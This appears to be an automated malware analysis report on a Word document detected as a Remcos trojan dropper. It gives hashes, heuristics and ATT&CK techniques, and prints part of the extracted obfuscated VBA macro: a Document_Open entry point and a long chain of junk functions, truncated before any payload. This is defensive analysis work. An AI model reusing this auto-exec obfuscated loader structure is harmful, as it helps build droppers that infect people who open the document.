Win.Trojan.Remcos-6656020-0 Office (OLE) malware analysis — malicious · 0409e5a5a78bfe51

MALICIOUS

Office (OLE)

690.5 KB Created: 2017-07-18 10:50:00 Authoring application: Microsoft Office Word First seen: 2018-09-04

MD5: f1cc78e32cca92d8ca0b593baa046ab6 SHA-1: 9dabdb1064d4cb56b6fee816c029cfb548915409 SHA-256: 0409e5a5a78bfe510576b516069d4119b45a717728edb1cd346f65cfb53b2de2

290 Risk Score

Malware Insights

Win.Trojan.Remcos-6656020-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample contains a VBA macro that is obfuscated and uses an auto-executing loader, specifically triggering on 'Document_Open'. Critical heuristics indicate the use of Shell() for execution, suggesting the macro's purpose is to download and execute a second-stage payload. The ClamAV detection name 'Win.Trojan.Remcos-6656020-0' strongly suggests the malware family.

Heuristics 8

ClamAV: Win.Trojan.Remcos-6656020-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Remcos-6656020-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 62450 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	62450 bytes
SHA-256: `c4b0a1da03a42bd15ca65b8dd143ffd34c15149ae9d4ed25c3cc5db397477fea`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.file2" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Public Sub DocUmeNT_OPEn(): Call RxOugYpUPEKgdou: End Sub Static Sub RxOugYpUPEKgdou() Call XQaMHRVtTXCVjzG End Sub Static Function XQaMHRVtTXCVjzG() As Object Call VmGCXUxVCpcYgFm End Function Function VmGCXUxVCpcYgFm() As Double Call cxBhOMIgaIgmvxh End Function Sub cxBhOMIgaIgmvxh() Call bLRktNOtecQOAjx End Sub Private Function bLRktNOtecQOAjx() Call kPwcyEDqYxfBZHc End Function Static Function kPwcyEDqYxfBZHc() As Variant Call lUvtsEnpxSbCnab End Function Sub lUvtsEnpxSbCnab() Call JlTPpgeJqlGROwz End Sub Private Function JlTPpgeJqlGROwz() As Integer Call YDLJcQPgPDSteNq End Function Private Sub YDLJcQPgPDSteNq() Call yNStprkmdXIiOQy End Sub Static Function yNStprkmdXIiOQy() As Long Call OXtAqaAvXrfjnNZ End Function Private Sub OXtAqaAvXrfjnNZ() Call DttNvlXZlJlzaNZ End Sub Private Sub DttNvlXZlJlzaNZ() Call VwEiLURTAeTZIrk End Sub Static Sub VwEiLURTAeTZIrk() Call LLoJfeSjjylODYU End Sub Static Function LLoJfeSjjylODYU() As Currency Call sasHowOBxRjQozX End Function Sub sasHowOBxRjQozX() Call khLwXFtCBlMesNr End Sub Private Function khLwXFtCBlMesNr() As Double Call gKHYYJqsPCaHfmn End Function Static Function gKHYYJqsPCaHfmn() As Variant Call YJKZWQzfoYOusgq End Function Static Function YJKZWQzfoYOusgq() As Date Call WeqPmTbHXqnxpmV End Function Function WeqPmTbHXqnxpmV() As String Call eqludLmSvKrLEdR End Function Private Function eqludLmSvKrLEdR() As Byte Call dDBxIMsfzdbnJQg End Function Static Function dDBxIMsfzdbnJQg() As Single Call mHgqNDhctyqaioM End Function Static Function mHgqNDhctyqaioM() As Object Call AhoWkppNxQrepYT End Function Function AhoWkppNxQrepYT() As Object Call YyLtiQfhqiWtQur End Function Private Function YyLtiQfhqiWtQur() As Single Call avuWrPuSkEdTnua End Function Private Sub avuWrPuSkEdTnua() Call NaLWhcmKdVYJQNq End Sub Static Sub NaLWhcmKdVYJQNq() Call ekmejLCTXpvKqKS End Sub Function ekmejLCTXpvKqKS() As Currency Call EmdbKkBLGKwYjuJ End Function Private Function EmdbKkBLGKwYjuJ() As Object Call kJxMEETrzcjBLod End Function Private Function kJxMEETrzcjBLod() As Integer Call aYgnYOUGivBpGVM End Function Static Sub aYgnYOUGivBpGVM() Call HoklhhPYwOzrrxQ End Sub Function HoklhhPYwOzrrxQ() As String Call zuDZQquaBjcFvKj End Function Private Sub zuDZQquaBjcFvKj() Call hCrlnHUekDlgoSW End Sub Static Function hCrlnHUekDlgoSW() As Object Call oWCDPBBDnWeWvei End Function Static Sub oWCDPBBDnWeWvei() Call XWZcBRFtsryWySF End Sub Sub XWZcBRFtsryWySF() Call fiVHrKQEQLCkNKB End Sub Private Function fiVHrKQEQLCkNKB() As Long Call NmRORCzqeAMyhZx End Function Static Function NmRORCzqeAMyhZx() As Variant Call ztvOUPCsxufSGkb End Function Static Sub ztvOUPCsxufSGkb() Call xnEqjRVCkZaKGki End Sub Static Function xnEqjRVCkZaKGki() As Single Call SxVmQvNJOTGFLjz End Function Sub SxVmQvNJOTGFLjz() Call vNjwtTgcsMvNRIN End Sub Private Function vNjwtTgcsMvNRIN() As Double Call yaonEPPogGpiBxS End Function Private Sub yaonEPPogGpiBxS() Call JtqtLEYMUyrRnLU End Sub Static Function JtqtLEYMUyrRnLU() As String Call vIkgzTwdTrzNDpO End Function Function vIkgzTwdTrzNDpO() As Long Call aJRRGoYUmnKTabv End Function Sub aJRRGoYUmnKTabv() Call ubyzYUmqvgfpWuc End Sub Static Sub ubyzYUmqvgfpWuc() Call VzcwnsbXEXJYTnG End Sub Static Sub VzcwnsbXEXJYTnG() Call JypKFEIMtTnSBeT End Sub Sub JypKFEIMtTnSBeT() Call TZHCxvnyMKecdLl End Sub Private Sub TZHCxvnyMKecdLl() Call pbILtYKrLGWwrsm End Sub Static Sub pbILtYKrLGWwrsm() Call TkGjluHwKAWdGxk End Sub Static Sub TkGjluHwKAWdGxk() Call mKEEocrgyrgatki End Sub Function mKEEocrgyrgatki() As String Call yVpXKQfpHltineT End Function Private Sub yVpXKQfpHltineT() Call lcSXNdhsbgMCMpw End Sub Private Sub lcSXNdhsbgMCMpw() Call fqsmN ... (truncated)

SHA-256: c4b0a1da03a42bd15ca65b8dd143ffd34c15149ae9d4ed25c3cc5db397477fea

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.file2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub DocUmeNT_OPEn(): Call RxOugYpUPEKgdou: End Sub
Static Sub RxOugYpUPEKgdou()
Call XQaMHRVtTXCVjzG
End Sub
Static Function XQaMHRVtTXCVjzG() As Object
Call VmGCXUxVCpcYgFm
End Function
Function VmGCXUxVCpcYgFm() As Double
Call cxBhOMIgaIgmvxh
End Function
Sub cxBhOMIgaIgmvxh()
Call bLRktNOtecQOAjx
End Sub
Private Function bLRktNOtecQOAjx()
Call kPwcyEDqYxfBZHc
End Function
Static Function kPwcyEDqYxfBZHc() As Variant
Call lUvtsEnpxSbCnab
End Function
Sub lUvtsEnpxSbCnab()
Call JlTPpgeJqlGROwz
End Sub
Private Function JlTPpgeJqlGROwz() As Integer
Call YDLJcQPgPDSteNq
End Function
Private Sub YDLJcQPgPDSteNq()
Call yNStprkmdXIiOQy
End Sub
Static Function yNStprkmdXIiOQy() As Long
Call OXtAqaAvXrfjnNZ
End Function
Private Sub OXtAqaAvXrfjnNZ()
Call DttNvlXZlJlzaNZ
End Sub
Private Sub DttNvlXZlJlzaNZ()
Call VwEiLURTAeTZIrk
End Sub
Static Sub VwEiLURTAeTZIrk()
Call LLoJfeSjjylODYU
End Sub
Static Function LLoJfeSjjylODYU() As Currency
Call sasHowOBxRjQozX
End Function
Sub sasHowOBxRjQozX()
Call khLwXFtCBlMesNr
End Sub
Private Function khLwXFtCBlMesNr() As Double
Call gKHYYJqsPCaHfmn
End Function
Static Function gKHYYJqsPCaHfmn() As Variant
Call YJKZWQzfoYOusgq
End Function
Static Function YJKZWQzfoYOusgq() As Date
Call WeqPmTbHXqnxpmV
End Function
Function WeqPmTbHXqnxpmV() As String
Call eqludLmSvKrLEdR
End Function
Private Function eqludLmSvKrLEdR() As Byte
Call dDBxIMsfzdbnJQg
End Function
Static Function dDBxIMsfzdbnJQg() As Single
Call mHgqNDhctyqaioM
End Function
Static Function mHgqNDhctyqaioM() As Object
Call AhoWkppNxQrepYT
End Function
Function AhoWkppNxQrepYT() As Object
Call YyLtiQfhqiWtQur
End Function
Private Function YyLtiQfhqiWtQur() As Single
Call avuWrPuSkEdTnua
End Function
Private Sub avuWrPuSkEdTnua()
Call NaLWhcmKdVYJQNq
End Sub
Static Sub NaLWhcmKdVYJQNq()
Call ekmejLCTXpvKqKS
End Sub
Function ekmejLCTXpvKqKS() As Currency
Call EmdbKkBLGKwYjuJ
End Function
Private Function EmdbKkBLGKwYjuJ() As Object
Call kJxMEETrzcjBLod
End Function
Private Function kJxMEETrzcjBLod() As Integer
Call aYgnYOUGivBpGVM
End Function
Static Sub aYgnYOUGivBpGVM()
Call HoklhhPYwOzrrxQ
End Sub
Function HoklhhPYwOzrrxQ() As String
Call zuDZQquaBjcFvKj
End Function
Private Sub zuDZQquaBjcFvKj()
Call hCrlnHUekDlgoSW
End Sub
Static Function hCrlnHUekDlgoSW() As Object
Call oWCDPBBDnWeWvei
End Function
Static Sub oWCDPBBDnWeWvei()
Call XWZcBRFtsryWySF
End Sub
Sub XWZcBRFtsryWySF()
Call fiVHrKQEQLCkNKB
End Sub
Private Function fiVHrKQEQLCkNKB() As Long
Call NmRORCzqeAMyhZx
End Function
Static Function NmRORCzqeAMyhZx() As Variant
Call ztvOUPCsxufSGkb
End Function
Static Sub ztvOUPCsxufSGkb()
Call xnEqjRVCkZaKGki
End Sub
Static Function xnEqjRVCkZaKGki() As Single
Call SxVmQvNJOTGFLjz
End Function
Sub SxVmQvNJOTGFLjz()
Call vNjwtTgcsMvNRIN
End Sub
Private Function vNjwtTgcsMvNRIN() As Double
Call yaonEPPogGpiBxS
End Function
Private Sub yaonEPPogGpiBxS()
Call JtqtLEYMUyrRnLU
End Sub
Static Function JtqtLEYMUyrRnLU() As String
Call vIkgzTwdTrzNDpO
End Function
Function vIkgzTwdTrzNDpO() As Long
Call aJRRGoYUmnKTabv
End Function
Sub aJRRGoYUmnKTabv()
Call ubyzYUmqvgfpWuc
End Sub
Static Sub ubyzYUmqvgfpWuc()
Call VzcwnsbXEXJYTnG
End Sub
Static Sub VzcwnsbXEXJYTnG()
Call JypKFEIMtTnSBeT
End Sub
Sub JypKFEIMtTnSBeT()
Call TZHCxvnyMKecdLl
End Sub
Private Sub TZHCxvnyMKecdLl()
Call pbILtYKrLGWwrsm
End Sub
Static Sub pbILtYKrLGWwrsm()
Call TkGjluHwKAWdGxk
End Sub
Static Sub TkGjluHwKAWdGxk()
Call mKEEocrgyrgatki
End Sub
Function mKEEocrgyrgatki() As String
Call yVpXKQfpHltineT
End Function
Private Sub yVpXKQfpHltineT()
Call lcSXNdhsbgMCMpw
End Sub
Private Sub lcSXNdhsbgMCMpw()
Call fqsmN
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.